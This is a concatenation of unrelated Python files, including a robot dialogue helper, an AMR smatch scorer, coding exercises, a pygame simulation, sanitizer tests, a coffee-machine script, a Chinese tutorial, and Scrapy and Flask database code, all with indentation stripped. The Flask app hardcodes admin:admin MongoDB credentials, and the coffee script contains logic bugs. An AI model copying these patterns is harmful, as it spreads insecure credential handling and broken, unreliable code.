Permet à partir d'un message et d'un type objet de parcourir le fichier trouvé de notre bdd
:return:
"""
sm.speech_and_move(u"redirecion sur explicator effectuée !")
sm.speech_and_move(u"Quelles informations désires-tu sur {} {}"
.format(obj.get_data(obj.__class__.DETERMINANT), obj.get_data(obj.__class__.NOM)))
list_obj = ["{}".format(key) for key in obj.data]
sm.speech_and_move(u"Tu peux avoir des informations sur {}".format(list_obj))
# On ecoute la question
question = nl.nao_listen()
# On regarde si l'info demandé est dans notre bdd et on boucle tant que l'utilisateur n'a pas dit non
while "non" not in question:
trouve = False
#On récupère chaque mot dans la phrase dite par l'utilisateur
for mot in question.split():
if mot in list_obj:
sm.speech_and_move(u"{} : {}".format(mot, obj.get_data(mot)))
trouve = True
#Si on ne trouve pas de reponse à la question, on renvoi sur wikipédia
if not trouve:
get_wikipedia_answer(question)
sm.speech_and_move(u"Voudrais tu d'autres infos ? Non si tu veux quitter, "
u"et un autre mot clé si tu veux continuer.")
question = nl.nao_listen()
|
data = [13, 15, 14, 17, 18, 16, 16]
d = 2
k = 1
answer = []
del_count = 0
pre_data = 0
for i, da in enumerate(data):
if i == 0 :
answer.append(da)
continue
if pre_data == 0:
pre_data = da
else:
if del_count > k:
answer.append(pre_data)
pre_data = da
del_count = 0
else:
if abs(pre_data - da) <= d:
del_count += 1
pre_data = da
else:
del_count = 0
answer.append(pre_data)
pre_data = da
if len(data)- 1 == i:
answer.append(da)
print(answer)
|
# -*- coding: utf-8 -*-
# !/usr/bin/env python
"""
This script computes smatch score between two AMRs.
For detailed description of smatch, see http://www.isi.edu/natural-language/amr/smatch-13.pdf
"""
import sys, json, argparse
from fast_smatch import amr
from fast_smatch._smatch import get_best_match, compute_f
from amr_parser.bert_utils import BertEncoderTokenizer
# total number of iteration in smatch computation
iteration_num = 5
# verbose output switch.
# Default false (no verbose output)
verbose = False
# single score output switch.
# Default true (compute a single score for all AMRs in two files)
single_score = True
# precision and recall output switch.
# Default false (do not output precision and recall, just output F score)
pr_flag = False
# Error log location
ERROR_LOG = sys.stderr
# Debug log location
DEBUG_LOG = sys.stderr
def get_amr_line(input_f):
"""
Read the file containing AMRs. AMRs are separated by a blank line.
Each call of get_amr_line() returns the next available AMR (in one-line form).
Note: this function does not verify if the AMR is valid
"""
cur_amr = []
has_content = False
for line in input_f:
line = line.strip()
if line == "":
if not has_content:
# empty lines before current AMR
continue
else:
# end of current AMR
break
if line.strip().startswith("#"):
# ignore the comment line (starting with "#") in the AMR file
continue
else:
has_content = True
cur_amr.append(line.strip())
return "".join(cur_amr)
def build_arg_parser():
"""
Build an argument g_parser using argparse. Use it when python version is 2.7 or later.
"""
parser = argparse.ArgumentParser(description="Smatch calculator -- arguments")
parser.add_argument('-f', nargs=2, required=True, type=argparse.FileType('r', encoding='utf-8'),
help='Two files containing AMR pairs. AMRs in each file are separated by a single blank line')
parser.add_argument('-r', type=int, default=4, help='Restart number (Default:4)')
parser.add_argument('-v', action='store_true', help='Verbose output (Default:false)')
parser.add_argument('--ms', action='store_true', default=False,
help='Output multiple scores (one AMR pair a score)' \
'instead of a single document-level smatch score (Default: false)')
parser.add_argument('--pr', action='store_true', default=False,
help="Output precision and recall as well as the f-score. Default: false")
return parser
def print_alignment(mapping, instance1, instance2):
"""
print the alignment based on a node mapping
Args:
match: current node mapping list
instance1: nodes of AMR 1
instance2: nodes of AMR 2
"""
result = []
for i, m in enumerate(mapping):
if m == -1:
result.append(instance1[i][1] + "(" + instance1[i][2] + ")" + "-Null")
else:
result.append(instance1[i][1] + "(" + instance1[i][2] + ")" + "-"
+ instance2[m][1] + "(" + instance2[m][2] + ")")
return " ".join(result)
def print_errors(mapping, amr1, amr2, prefix1, prefix2):
(instance1, attribute1, relation1) = amr1
(instance2, attribute2, relation2) = amr2
inst1_match = [False for x in instance1]
attr1_match = [False for x in attribute1]
rel1_match = [False for x in relation1]
inst2_match = [False for x in instance2]
attr2_match = [False for x in attribute2]
rel2_match = [False for x in relation2]
for i in range(0, len(instance1)):
if mapping[i] != -1:
if instance1[i][2].lower() == instance2[mapping[i]][2].lower(): # exists a mapping, and the names match
inst1_match[i] = True
inst2_match[mapping[i]] = True
# else:
# print "Incorrect aligned concept: ", instance1[i][2], "->", instance2[mapping[i]][2].lower()
for i in range(0, len(attribute1)):
for j in range(0, len(attribute2)):
# if both attribute relation triple have the same relation name and value
if attribute1[i][0].lower() == attribute2[j][0].lower() \
and attribute1[i][2].lower() == attribute2[j][2].lower():
node1_index = int(attribute1[i][1][len(prefix1):])
node2_index = int(attribute2[j][1][len(prefix2):])
# if the mapping is correct
if mapping[node1_index] == node2_index:
attr1_match[i] = True
attr2_match[j] = True
for i in range(0, len(relation1)):
for j in range(0, len(relation2)):
# if both relations share the same name
if relation1[i][0].lower() == relation2[j][0].lower():
node1_index_amr1 = int(relation1[i][1][len(prefix1):])
node1_index_amr2 = int(relation2[j][1][len(prefix2):])
node2_index_amr1 = int(relation1[i][2][len(prefix1):])
node2_index_amr2 = int(relation2[j][2][len(prefix2):])
# if the mappings are correct
if mapping[node1_index_amr1] == node1_index_amr2 and mapping[node2_index_amr1] == node2_index_amr2:
rel1_match[i] = True
rel2_match[j] = True
# for i in range(0, len(instance1)):
# if not inst1_match[i]:
# print "Incorrect concept: ", instance1[i][2]
# for i in range(0, len(instance2)):
# if not inst2_match[i]:
# print "Missing concept: ", instance2[i][2]
# for i in range(0, len(attribute1)):
# if not attr1_match[i]:
# print "Incorrect attribute: ", attribute1[i][0], attribute1[i][2]
# for i in range(0, len(attribute2)):
# if not attr2_match[i]:
# print "Missing attribute: ", attribute2[i][0], attribute2[i][2]
# for i in range(0, len(relation1)):
# if not rel1_match[i]:
# node1 = int(relation1[i][1][len(prefix1):])
# node2 = int(relation1[i][2][len(prefix1):])
# print "Incorrect relation: ", instance1[node1][2], ":"+relation1[i][0], instance1[node2][2]
# for i in range(0, len(relation2)):
# if not rel2_match[i]:
# node1 = int(relation2[i][1][len(prefix2):])
# node2 = int(relation2[i][2][len(prefix2):])
# print "Missing relation: ", instance2[node1][2], ":"+relation2[i][0], instance2[node2][2]
def main(arguments):
"""
Main function of smatch score calculation
"""
global verbose
global iteration_num
global single_score
global pr_flag
# set the iteration number
# total iteration number = restart number + 1
iteration_num = arguments.r + 1
if arguments.ms:
single_score = False
if arguments.v:
verbose = True
if arguments.pr:
pr_flag = True
# matching triple number
total_match_num = 0
# triple number in test file
total_test_num = 0
# triple number in gold file
total_gold_num = 0
# sentence number
sent_num = 1
# Read amr pairs from two files
bert_tokenizer = BertEncoderTokenizer.from_pretrained('./bert-base-cased', do_lower_case=False)
while True:
cur_amr1 = get_amr_line(args.f[0])
cur_amr2 = get_amr_line(args.f[1])
if cur_amr1 == "" and cur_amr2 == "":
break
if cur_amr1 == "":
print("Error: File 1 has less AMRs than file 2", file=ERROR_LOG)
print("Ignoring remaining AMRs", file=ERROR_LOG)
break
if cur_amr2 == "":
print("Error: File 2 has less AMRs than file 1", file=ERROR_LOG)
print("Ignoring remaining AMRs", file=ERROR_LOG)
break
amr1 = amr.AMR.parse_AMR_line(cur_amr1)
amr2 = amr.AMR.parse_AMR_line(cur_amr2)
prefix1 = "a"
prefix2 = "b"
# Rename node to "a1", "a2", .etc
amr1.rename_node(prefix1)
# Renaming node to "b1", "b2", .etc
amr2.rename_node(prefix2)
(instance1, attributes1, relation1) = amr1.get_triples()
(instance2, attributes2, relation2) = amr2.get_triples()
if verbose:
# print parse results of two AMRs
print("AMR pair", sent_num, file=DEBUG_LOG)
print("============================================", file=DEBUG_LOG)
print("AMR 1 (one-line):", cur_amr1, file=DEBUG_LOG)
print("AMR 2 (one-line):", cur_amr2, file=DEBUG_LOG)
print("Instance triples of AMR 1:", len(instance1), file=DEBUG_LOG)
print(instance1, file=DEBUG_LOG)
print("Attribute triples of AMR 1:", len(attributes1), file=DEBUG_LOG)
print(attributes1, file=DEBUG_LOG)
print("Relation triples of AMR 1:", len(relation1), file=DEBUG_LOG)
print(relation1, file=DEBUG_LOG)
print("Instance triples of AMR 2:", len(instance2), file=DEBUG_LOG)
print(instance2, file=DEBUG_LOG)
print("Attribute triples of AMR 2:", len(attributes2), file=DEBUG_LOG)
print(attributes2, file=DEBUG_LOG)
print("Relation triples of AMR 2:", len(relation2), file=DEBUG_LOG)
print(relation2, file=DEBUG_LOG)
(best_mapping, best_match_num) = get_best_match(instance1, attributes1, relation1,
instance2, attributes2, relation2,
prefix1, prefix2, verbose=verbose)
if verbose:
print("best match number", best_match_num, file=DEBUG_LOG)
print("best node mapping", best_mapping, file=DEBUG_LOG)
print("Best node mapping alignment:", print_alignment(best_mapping, instance1, instance2), file=DEBUG_LOG)
test_triple_num = len(instance1) + len(attributes1) + len(relation1)
gold_triple_num = len(instance2) + len(attributes2) + len(relation2)
print_errors(best_mapping, (instance1, attributes1, relation1), (instance2, attributes2, relation2), prefix1,
prefix2)
if not single_score:
# if each AMR pair should have a score, compute and output it here
(precision, recall, best_f_score) = compute_f(best_match_num,
test_triple_num,
gold_triple_num,
verbose)
# print "Sentence", sent_num
if pr_flag:
print("Precision: %.2f" % precision)
print("Recall: %.2f" % recall)
print("F1: %.3f" % best_f_score)
total_match_num += best_match_num
total_test_num += test_triple_num
total_gold_num += gold_triple_num
sent_num += 1
if verbose:
print("Total match number, total triple number in AMR 1, and total triple number in AMR 2:", file=DEBUG_LOG)
print(total_match_num, total_test_num, total_gold_num, file=DEBUG_LOG)
print("---------------------------------------------------------------------------------", file=DEBUG_LOG)
# output document-level smatch score (a single f-score for all AMR pairs in two files)
if single_score:
(precision, recall, best_f_score) = compute_f(total_match_num, total_test_num, total_gold_num)
if pr_flag:
print("Precision: %.3f" % precision)
print("Recall: %.3f" % recall)
print("Document F-score: %.3f" % best_f_score)
args.f[0].close()
args.f[1].close()
if __name__ == "__main__":
parser = build_arg_parser()
args = parser.parse_args()
main(args)
|
'''
238. Product of Array Except Self
Given an array nums of n integers where n > 1, return an array output such that output[i] is equal to the product of all the elements of nums except nums[i].
Example:
Input: [1,2,3,4]
Output: [24,12,8,6]
Constraint: It's guaranteed that the product of the elements of any prefix or suffix of the array (including the whole array) fits in a 32 bit integer.
Note: Please solve it without division and in O(n).
Follow up:
Could you solve it with constant space complexity? (The output array does not count as extra space for the purpose of space complexity analysis.)
'''
from typing import List
class Solution:
# O(n)
def bruteForce(self, array):
products = [1 for _ in range(len(array))]
for i in range(len(array)):
product = 1
for j in range(len(array)):
if i != j:
product *= array[j]
products[i] = product
return products
# O(n)
def threeLoops(self, array):
products = [1 for _ in range(len(array))]
leftProducts = [1 for _ in range(len(array))]
rightProducts = [1 for _ in range(len(array))]
lp = 1
for i in range(len(array)):
leftProducts[i] = lp
lp *= array[i]
rp = 1
for i in reversed(range(len(array))):
rightProducts[i] = rp
rp *= array[i]
for i in range(len(array)):
products[i] = leftProducts[i] * rightProducts[i]
return products
# O(n) space-optimized
def twoLoops(self, array):
products = [1 for _ in range(len(array))]
lp = 1
for i in range(len(array)):
products[i] = lp
lp *= array[i]
rp = 1
for i in reversed(range(len(array))):
products[i] *= rp
rp *= array[i]
return products
def productExceptSelf(self, nums: List[int]) -> List[int]:
return self.twoLoops(nums)
if __name__ == "__main__":
solution = Solution()
sample_input = [1,2,3,4]
sample_output = [24,12,8,6]
assert solution.productExceptSelf(sample_input) == sample_output
print("Test passed")
|
import unittest
from katas.kyu_7.summing_a_numbers_digits import sumDigits
class SumDigitsTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(sumDigits(10), 1)
def test_equals_2(self):
self.assertEqual(sumDigits(99), 18)
def test_equals_3(self):
self.assertEqual(sumDigits(-32), 5)
|
import pygame
from random import randint
import math
class Particle(object):
gravity_switch = True
gravity = (math.pi / 2, 0.5)
elastic = 0.8
def __init__(self, coordinate, radius, velocity, thickness=4):
self.x, self.y = coordinate
self.radius = radius
self.mass_density = 100
self.mass = 4 / 3 * math.pi * math.pow(self.radius, 3) * self.mass_density
self.color = (randint(50, 255), randint(50, 255), randint(50, 255))
self.oldColor = self.color
self.thickness = thickness
self.speed, self.angle = velocity
self.drag = 0.9999
def display(self, screen):
pygame.draw.circle(screen, self.color, (int(self.x), int(self.y)), self.radius, self.thickness)
dx = math.cos(self.angle) * self.speed # vx * t
dy = math.sin(self.angle) * self.speed
# pygame.draw.lines(screen, self.color, False, [(self.x, self.y), (self.x + pow(10, 3) * dx, self.y + pow(10, 3) * dy)], 2)
def move(self, screen):
# air friction
self.speed *= self.drag
if self.speed < 0.2 and screen.get_height() - (self.y + self.radius) < 0.4:
# make the balls stop more naturally
self.speed *= 0.05
self.y = screen.get_height() - self.radius
else:
# gravity effect
if Particle.gravity_switch:
self.angle, self.speed = self.add_vector((self.angle, self.speed), Particle.gravity)
# update position
dx = math.cos(self.angle) * self.speed # dx = vx * t
dy = math.sin(self.angle) * self.speed # dy = vy * t
self.x += dx # x = x0 + vx * t
self.y += dy # y = y0 + vy * t
def drag_move_params_update(self, screen, mouse_pos):
mouseX, mouseY = mouse_pos
if mouseX > screen.get_width():
self.x = screen.get_width() - self.radius
self.speed = 0
else:
dx = mouseX - self.x
dy = mouseY - self.y
self.speed = math.hypot(dx, dy) * 0.5
self.angle = math.atan2(dy, dx)
def wall_bounce(self, screen):
width = screen.get_width()
height = screen.get_height()
# right boundary check
d1 = self.x - (width - self.radius)
if d1 >= 0: # the ball has crossed the right wall a distance d1
self.x = (width - self.radius) - d1 # reflect x
self.angle = math.pi - self.angle # reflect the angle
self.speed *= Particle.elastic # elastic lost
# left boundary check
d2 = self.radius - self.x
if d2 >= 0: # the ball has crossed the left wall a distance d2
self.x = d2 + self.radius # reflect x
self.angle = math.pi - self.angle # reflect the angle
self.speed *= Particle.elastic # elastic lost
# top boundary check
a1 = self.radius - self.y
if a1 >= 0: # the ball has crossed the ceiling a distance a1
self.y = a1 + self.radius
self.angle = - self.angle
self.speed *= Particle.elastic
# bottom boundary check
a2 = self.y + self.radius - height
if a2 >= 0: # the ball has sink down below the floor a distance a2
self.y = height - self.radius - a2
self.angle = - self.angle
self.speed *= Particle.elastic
def add_vector(self, vector1, vector2):
a1 = vector1[0]
sp1 = vector1[1]
x1 = sp1 * math.cos(a1)
y1 = sp1 * math.sin(a1)
a2 = vector2[0]
sp2 = vector2[1]
x2 = sp2 * math.cos(a2)
y2 = sp2 * math.sin(a2)
sum_x = x1 + x2
sum_y = y1 + y2
sum_angle = math.atan2(sum_y , sum_x)
# sum_mag = math.sqrt(math.pow(sum_x, 2) + math.pow(sum_y, 2))
sum_mag = math.hypot(sum_x, sum_y)
return sum_angle, sum_mag
|
from .info import get_alliance_info as get_info
|
# vim:fenc=utf-8 ff=unix ft=python ts=4 sw=4 sts=4 si et
import unittest
from bleach_allowlist.bleach_allowlist import (
markdown_tags as allowlist_markdown_tags,
markdown_attrs as allowlist_markdown_attrs
)
from mkdocssafetext.config import SafeTextPluginConfig
class TestSafeTextPlugin(unittest.TestCase):
def setUp(self):
pass
def test_default_config_is_based_on_allowlist(self):
config_is_nothing = {
'append_allowed_tags': [],
'remove_allowed_tags': [],
'allowed_attrs': {},
}
plugin_config = SafeTextPluginConfig(config_is_nothing)
self.assertEqual(plugin_config.markdown_tags,
allowlist_markdown_tags)
self.assertEqual(plugin_config.markdown_attrs,
allowlist_markdown_attrs)
def test_append_allowed_tags(self):
config_append_allowed_tags = {
'append_allowed_tags': ['video', 'audio'],
'remove_allowed_tags': [],
'allowed_attrs': {},
}
plugin_config = SafeTextPluginConfig(config_append_allowed_tags)
self.assertIn('video', plugin_config.markdown_tags)
self.assertIn('audio', plugin_config.markdown_tags)
self.assertNotIn('undefined', plugin_config.markdown_tags)
self.assertNotEqual(plugin_config.markdown_tags,
allowlist_markdown_tags)
def test_remove_allowed_tags(self):
config_remove_allowed_tags = {
'append_allowed_tags': [],
'remove_allowed_tags': ['ul', 'ol', 'li'],
'allowed_attrs': {},
}
plugin_config = SafeTextPluginConfig(config_remove_allowed_tags)
self.assertNotIn('ul', plugin_config.markdown_tags)
self.assertNotIn('ol', plugin_config.markdown_tags)
self.assertNotIn('li', plugin_config.markdown_tags)
self.assertIn('h1', plugin_config.markdown_tags)
self.assertNotEqual(plugin_config.markdown_tags,
allowlist_markdown_tags)
def test_allowed_attrs(self):
config_allowed_attrs = {
'append_allowed_tags': [],
'remove_allowed_tags': [],
'allowed_attrs': {"img": ["src", "width", "height"]},
}
plugin_config = SafeTextPluginConfig(config_allowed_attrs)
self.assertEqual(plugin_config.markdown_attrs,
config_allowed_attrs['allowed_attrs'])
self.assertNotEqual(plugin_config.markdown_attrs,
allowlist_markdown_attrs)
def test_str(self):
config_is_nothing = {
'append_allowed_tags': [],
'remove_allowed_tags': [],
'allowed_attrs': {},
}
plugin_config = SafeTextPluginConfig(config_is_nothing)
printable_plugin = str(plugin_config)
self.assertIn('tags:', printable_plugin)
self.assertIn('attrs: ', printable_plugin)
def tearDown(self):
pass
|
MENU = {
"espresso": {
"ingredients": {
"water": 50,
"coffee": 18,
},
"cost": 1.5,
},
"latte": {
"ingredients": {
"water": 200,
"milk": 150,
"coffee": 24,
},
"cost": 2.5,
},
"cappuccino": {
"ingredients": {
"water": 250,
"milk": 100,
"coffee": 24,
},
"cost": 3.0,
}
}
resources = {
"water": 300,
"milk": 200,
"coffee": 100,
"money": 0,
}
STATE = 'on'
def print_report():
print(f"Water: {resources['water']}ml.")
print(f'Milk: {resources["milk"]}ml.')
print(f'Coffee: {resources["coffee"]}gram.')
print(f'Money: ${resources["money"]}')
def check_resources(coffee):
global MENU
global resources
is_espresso = coffee == 'espresso'
if is_espresso:
enough_water = resources["water"] > MENU[coffee]['ingredients']['water']
enough_coffee = resources["coffee"] > MENU[coffee]['ingredients']['coffee']
else:
enough_water = resources["water"] > MENU[coffee]['ingredients']['water']
enough_coffee = resources["coffee"] > MENU[coffee]['ingredients']['coffee']
enough_milk = resources["milk"] > MENU[coffee]['ingredients']['milk']
if enough_water and is_espresso and enough_coffee:
return True
elif enough_water and enough_milk and enough_coffee:
return True
elif is_espresso:
if not enough_water:
print("Sorry there is not enough water.")
elif not enough_coffee:
print("Sorry there is not enough coffee.")
# elif not enough_milk:
# print("Sorry there is not enough milk.")
return False
else:
if not enough_water:
print("Sorry there is not enough water.")
elif not enough_coffee:
print("Sorry there is not enough coffee.")
elif not enough_milk:
print("Sorry there is not enough milk.")
return False
def process_coins(coffee):
print('Please insert coins.')
quarters = int(input("How many quarters?: "))
dimes = int(input("How many dimes?: "))
nickles = int(input("How many nickles?: "))
pennies = int(input("How many pennies?: "))
money_received = pennies * 0.01 + nickles * 0.05 + dimes * 0.1 + quarters * 0.25
cost_of_coffee = MENU[coffee]['cost']
change = money_received - cost_of_coffee
if money_received < cost_of_coffee:
print("Sorry that's not enough money. Money refunded")
return False
elif change > 0:
print(f'Here is ${change} in change.')
return True
def make_coffee(coffee):
global resources
global MENU
if coffee == 'espresso':
resources["water"] -= MENU[coffee]['ingredients']['water']
resources["coffee"] -= MENU[coffee]['ingredients']['coffee']
resources['money'] += MENU[coffee]['cost']
else:
resources["water"] -= MENU[coffee]['ingredients']['water']
resources["coffee"] -= MENU[coffee]['ingredients']['coffee']
resources["milk"] -= MENU[coffee]['ingredients']['milk']
resources['money'] += MENU[coffee]['cost']
while STATE == 'on':
customer_input = input("What would you like? (espresso/latte/cappuccino):")
if customer_input == 'report':
print_report()
elif customer_input == 'off':
state = 'off'
elif customer_input == 'espresso' or input == 'latte' or input == 'cappuccino':
if check_resources(customer_input):
if process_coins(customer_input):
make_coffee(customer_input)
print(f'Here is your {customer_input} Enjoy!')
|
# 用戶定义类,数字常量和内置数学工具和扩展,表达式操作符递归阶乘
__author__ = 'bilaisheng'
'''
1.类的定义
2.父类,子类定义,以及子类调用父类
3.类的组合使用
4.内置功能
'''
# 类的定义
# class Hotel(object):
# # 构造函数
# def __init__(self, room, cf=1.0, br=15):
# self.room = room;
# self.cf = cf;
# self.br = br;
#
# def calc_all(self, days=1):
# return (self.room * self.cf + self.br) * days
#
# if __name__ == '__main__':
# stdroom = Hotel(200)
# big_room = Hotel(230, 0.9)
# print(stdroom.calc_all())
# print(stdroom.calc_all(2))
# print(big_room.calc_all())
# print(big_room.calc_all(2))
# 父类 子类以及调用父类
# 父类
class AddBook(object):
def __init__(self, name, phone):
self.name = name
self.phone = phone
def get_phone(self):
return self.phone
# 子类继承
# class EmplEmail(AddBook):
#
# def __int__(self,nm, ph, email):
# # AddBook.__init__(selef, nm, ph) # 调用父类方法一
# super(EmplEmail, self).__init__(nm, ph)
# self.email = email
#
# def get_email(self):
# return self.email
#
# # 调用
# if __name__ == '__main__':
#
# detian = AddBook('Detian', '12345678901')
# meng = AddBook('Meng', '12345678902')
# print(detian.get_phone())
# print(AddBook.get_phone(meng))
#
# alice = EmplEmail('godliness', '1234567890', 'godliness@qq.com')
#
# print(alice.get_email(), alice.get_phone())
# 类的组合使用
'''
1.class类的组合使用
2.手机、邮箱、QQ等是可以变化的(定义在一起),姓名不可变(单独定义)。
3.在另一个类中引用
'''
# class Info(object):
# def __init__(self, phone, email, qq):
# self.phone = phone
# self.email = email
# self.qq = qq
#
# def get_phone(self):
# return self.phone
#
# def update_phone(self, newphone):
# self.phone = newphone
# print("手机号更改已更改")
#
# def get_email(self):
# return self.email
#
#
# class AddrBook(object):
# def __init__(self, name, phone, email, qq):
# self.name = name
# self.info = Info(phone, email, qq)
#
#
# if __name__ == "__main__":
# Detian = AddrBook('godliness', '1234567890', '1234567890@qq.com', '123456')
# print(Detian.info.get_phone())
# Detian.info.update_phone(738423647)
# print(Detian.info.get_phone())
# print(Detian.info.get_email())
'''
** x**y x的y次方
// x // y 两数相除向下取整
'''
x = 5
y = 3
a = 4
b = 2
print(x + y) # 结果为 7
print(x - y) # 结果为2
print(x * y) # 结果为15
print(x / y) # 结果为1.6666666666666667 不同的机器浮点数的结果可能不同
print(x // y) # 向下去整结果为1
print(x % y) # 两数相除取余结果为2
print(x ** y) # 5的3次幂结果为125
print(a / b) # 结果为浮点数2.0
print(a % b) # 取余结果为0
print(a // b) # 取整结果为2
'''
关系运算符是对两个对象进行比较。
运算符 表达式 说明
== a==b 等于,比较对象是否相等
!=或<> a !=b ,a <>b 不等于,比较两个对象是否不相等
'''
a = 4
b = 2
c = 2
print(a == b) # False
print(a != b) # True
print(a > b) # True
print(a < b) # False
print(a >= b) # True
print(c <= b) # True
a = 4
b = 2
c = 0
print(a > b and b > c) # a>b为True继续计算b>c,b>c也为True则结果为True
print(a > b and b < c) # a>b为True继续计算c<b,b>c结果为False则结果为False
print(a > b or c < b) # a>b为True则不继续计算c<b,结果为True
print(not c < b) # c<b为True not True结果为False
print(not a < b) # a<b为False not Flase结果为True
a = 4
c = 0
list = [1, 2, 3, 4, 5]
if (a in list):
print("%d is in list:%r" % (a, list))
if (c not in list):
print("%d is not in list: %r" % (c, list))
# Python数学函数:
'''
需要导入math 模块包
函数 返回值 ( 描述 )
abs(x) 返回数字的绝对值,如abs(-10) 返回 10
ceil(x) 返回数字的上入整数,如math.ceil(4.1) 返回 5
cmp(x, y) 如果 x < y 返回 -1, 如果 x == y 返回 0, 如果 x > y 返回 1
exp(x) 返回e的x次幂(ex),如math.exp(1) 返回2.718281828459045
fabs(x) 返回数字的绝对值,如math.fabs(-10) 返回10.0
floor(x) 返回数字的下舍整数,如math.floor(4.9)返回 4
log(x) 如math.log(math.e)返回1.0,math.log(100,10)返回2.0
log10(x) 返回以10为基数的x的对数,如math.log10(100)返回 2.0
max(x1, x2,...) 返回给定参数的最大值,参数可以为序列。
min(x1, x2,...) 返回给定参数的最小值,参数可以为序列。
modf(x) 返回x的整数部分与小数部分,两部分的数值符号与x相同,整数部分以浮点型表示。
pow(x, y) x**y 运算后的值。
round(x [,n]) 返回浮点数x的四舍五入值,如给出n值,则代表舍入到小数点后的位数。
sqrt(x) 返回数字x的平方根,数字可以为负数,返回类型为实数,如math.sqrt(4)返回 2+0j
可以直接访问的数学函数:
abs(x) 返回数字的绝对值,如abs(-10) 返回 10
cmp(x, y) 如果 x < y 返回 -1, 如果 x == y 返回 0, 如果 x > y 返回 1
max(x1, x2,...) 返回给定参数的最大值,参数可以为序列。
min(x1, x2,...) 返回给定参数的最小值,参数可以为序列。
round(x [,n]) 返回浮点数x的四舍五入值,如给出n值,则代表舍入到小数点后的位数。
Python随机数函数:
python的随机数函数是不能直接访问的,需要导入 random 模块,然后通过 random 静态对象调用该方法。
函数 描述
choice(seq) 从序列的元素中随机挑选一个元素,比如random.choice(range(10)),从0到9中随机挑选一个整数。
randrange ([start,] stop [,step]) 从指定范围内,按指定基数递增的集合中获取一个随机数,基数缺省值为1
random() 随机生成下一个实数,它在[0,1)范围内。
seed([x]) 改变随机数生成器的种子seed。
shuffle(lst) 将序列的所有元素随机排序
uniform(x, y) 随机生成下一个实数,它在[x,y]范围内。
'''
import random
print("choice([1, 2, 3, 5, 9]) : ", random.choice([1, 2, 3, 5, 9]))
# 输出 100 <= number < 1000 间的偶数
print("randrange(100, 1000, 2) : ", random.randrange(100, 1000, 2))
# 生成第一个随机数
print("random() : ", random.random())
# 生成同一个随机数
random.seed(10)
print("Random number with seed 10 : ", random.random())
list = [20, 16, 10, 5];
random.shuffle(list)
print("随机排序列表 : ", list)
print("uniform(5, 10) 的随机数为 : ", random.uniform(5, 10))
'''
Python三角函数:
Python三角函数是不能直接访问的,需要导入 math 模块,然后通过 math 静态对象调用该方法。
函数 描述
acos(x) 返回x的反余弦弧度值。
asin(x) 返回x的反正弦弧度值。
atan(x) 返回x的反正切弧度值。
atan2(y, x) 返回给定的 X 及 Y 坐标值的反正切值。
cos(x) 返回x的弧度的余弦值。
hypot(x, y) 返回欧几里德范数 sqrt(x*x + y*y)。
sin(x) 返回的x弧度的正弦值。
tan(x) 返回x弧度的正切值。
degrees(x) 将弧度转换为角度,如degrees(math.pi/2) , 返回90.0
radians(x) 将角度转换为弧度
'''
import math
print("degrees(3) : ", math.degrees(3))
print("radians(-3) : ", math.radians(-3))
print("sin(3) : ", math.sin(3))
print("cos(3) : ", math.cos(3))
print("tan(3) : ", math.tan(3))
print("acos(0.64) : ", math.acos(0.64))
print("asin(0.64) : ", math.asin(0.64))
print("atan(0.64) : ", math.atan(0.64))
print("atan2(-0.50,-0.50) : ", math.atan2(-0.50,-0.50))
print("hypot(0, 2) : ", math.hypot(0, 2))
'''
Python数学常量:
常量 描述
pi 数学常量 pi(圆周率,一般以π来表示)
e 数学常量 e,e即自然常数(自然常数)。
'''
print(math.pi)
print(math.e)
|
#!/usr/bin/env python
"""
Find the minimun element in a
Python List using recursion.
"""
def min_element(arr, last):
if len(arr) == 1:
return last
else:
if arr[0] < last:
new_min = arr[0]
else:
new_min = last
return min_element(arr[1:], new_min)
print(min_element([-20, 2, 3, 4, 5, 6, -1, 66], 66))
|
import os
import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
# app = dash.Dash(
# __name__,
# external_stylesheets=[dbc.themes.BOOTSTRAP],
# meta_tags=[
# {'name': 'viewport',
# 'content': 'width=device-width, initial-scale=1.0'}
# ]
# )
layout = html.Div([
"Home Page change"
])
# if __name__ == '__main__':
# app.run_server(debug = False)
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import json
from twisted.enterprise import adbapi
from scrapy import log
import MySQLdb
import MySQLdb.cursors
class DoubanPipeline(object):
def __init__(self):
self.file = open("./books.json", "wb")
def process_item(self, item, spider):
# 编码的转换
for k in item:
item[k] = item[k].encode("utf8")
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
class MySQLPipeline(object):
def __init__(self):
self.dbpool = adbapi.ConnectionPool("MySQLdb",
db = "dbname", # 数据库名
user = "username", # 数据库用户名
passwd = "password", # 密码
cursorclass = MySQLdb.cursors.DictCursor,
charset = "utf8",
use_unicode = False
)
def process_item(self, item, spider):
query = self.dbpool.runInteraction(self._conditional_insert, item)
query.addErrback(self.handle_error)
return item
def _conditional_insert(self, tb, item):
tb.execute("insert into tabelname (name, author, press, date, page, price, score, ISBN, author_profile,\
content_description, link) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)",\
(item["name"], item["author"], item["press"], item["date"],\
item["page"], item["price"], item["score"], item["ISBN"],\
item["author_profile"], item["content_description"], item["link"]))
log.msg("Item data in db: %s" % item, level=log.DEBUG)
def handle_error(self, e):
log.err(e)
|
from flask import Flask
from flask import jsonify
from flask import request
from flask_pymongo import PyMongo
import config
import json
from bson import ObjectId
app = Flask(__name__)
app.config["MONGODB_DB"] = "myFirstDatabase"
app.config['MONGO_URI'] = 'mongodb+srv://admin:admin@cluster0.og2k6.mongodb.net/myFirstDatabase?retryWrites=true&w=majority'
mongo = PyMongo(app)
@app.route('/getEliteUsers/<string:year>', methods=['GET'])
def get_elite_users(year):
data = mongo.db.myData.aggregate(
[{"$match": {"elite": {"$regex": year}}}])
# print(data)
output = json.dumps(list(data), default=str)
# print(output)
# for obj in data:
# # print("this is the output", obj['name'])
# output.append({'name': obj['name'], 'review_count': obj['review_count'], 'yelping_since': obj['yelping_since']})
# # print(output)
return jsonify({'result': output})
# @app.route('/deleteUsers/<int:number>', methods = ["DELETE"])
# def delete_users(number):
# ndoc = mongo.db.myData.find({}, ('_id',), limit=number)
# selector = {'_id': {'$in': [doc['_id'] for doc in ndoc]}}
# result = mongo.db.myData.delete_many(selector)
# print("The ackowledgement value is {0} and the deleted count {1}".format(result.acknowledged, result.deleted_count))
# return jsonify({'result': result.acknowledged})
